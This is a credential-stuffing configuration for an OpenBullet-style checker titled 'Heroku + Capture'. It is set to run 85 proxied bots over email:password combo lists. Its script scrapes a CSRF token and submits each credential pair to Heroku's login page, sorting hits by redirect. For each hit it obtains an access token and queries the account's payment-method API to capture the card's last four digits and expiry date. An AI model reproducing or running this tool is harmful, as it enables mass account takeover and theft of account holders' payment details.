[SETTINGS]
{
  "Name": "Heroku",
  "SuggestedBots": 85,
  "MaxCPM": 0,
  "LastModified": "2021-10-04T12:19:21.7936915-07:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "simple",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Heroku + Capture",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST GET "https://id.heroku.com/login" 
  
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Cache-Control: max-age=0" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Length: 112" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "Host: id.heroku.com" 
  HEADER "Origin: https://id.heroku.com" 
  HEADER "Referer: https://id.heroku.com/login" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36" 

PARSE "<SOURCE>" LR "_csrf\" type=\"hidden\" value=\"" "\" " -> VAR "token" 

REQUEST POST "https://id.heroku.com/login" AutoRedirect=FALSE 
  CONTENT "_csrf=<token>&email=<USER>&password=<PASS>&commit=Log+In" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Cache-Control: max-age=0" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "Host: id.heroku.com" 
  HEADER "Origin: https://id.heroku.com" 
  HEADER "Referer: https://id.heroku.com/login" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "<HEADERS(Location)>" Contains "https://id.heroku.com/login" 
  KEYCHAIN Success OR 
    KEY "<HEADERS(Location)>" Contains "https://dashboard.heroku.com" 
  KEYCHAIN Custom "FREE" OR 
    KEY "Add an extra layer of protection to to your Heroku account." 

REQUEST GET "https://auth.heroku.com/login?state=https%3A%2F%2Fdashboard.heroku.com%2Fauth%2Fheroku%2Fcallback" AutoRedirect=FALSE 
  
  HEADER "Host: auth.heroku.com" 
  HEADER "Connection: keep-alive" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Referer: https://dashboard.heroku.com/" 
  HEADER "Accept-Language: en-US,en;q=0.9" 

REQUEST GET "<HEADERS(Location)>" AutoRedirect=FALSE 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

REQUEST GET "<HEADERS(Location)>" AutoRedirect=FALSE 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "href=\"https://dashboard.heroku.com/auth/heroku/callback?code=" "\"" -> VAR "pwd" 

REQUEST POST "https://auth.heroku.com/login/token" 
  CONTENT "grant_type=password&username=null&password=<pwd>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: auth.heroku.com" 
  HEADER "Connection: keep-alive" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" 
  HEADER "content-type: application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "Origin: https://dashboard.heroku.com" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Referer: https://dashboard.heroku.com/" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate" 

PARSE "<SOURCE>" JSON "access_token" -> VAR "token" 

REQUEST GET "https://api.heroku.com/account/payment-method" 
  
  HEADER "Host: api.heroku.com" 
  HEADER "Connection: keep-alive" 
  HEADER "Accept: application/vnd.heroku+json; version=3" 
  HEADER "X-Origin: https://dashboard.heroku.com" 
  HEADER "X-Heroku-Requester: dashboard" 
  HEADER "Authorization: Bearer <token>" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36" 
  HEADER "Origin: https://dashboard.heroku.com" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Referer: https://dashboard.heroku.com/" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "FREE" OR 
    KEY "card_last4\":null" 

PARSE "<SOURCE>" JSON "card_last4" CreateEmpty=FALSE -> CAP "Card Num" 

PARSE "<SOURCE>" JSON "expiration_month" -> VAR "m" 

PARSE "<SOURCE>" JSON "expiration_year" -> VAR "y" 

#Card_Expiry FUNCTION Constant "<m>/<y>" -> CAP "Card Expiry" 

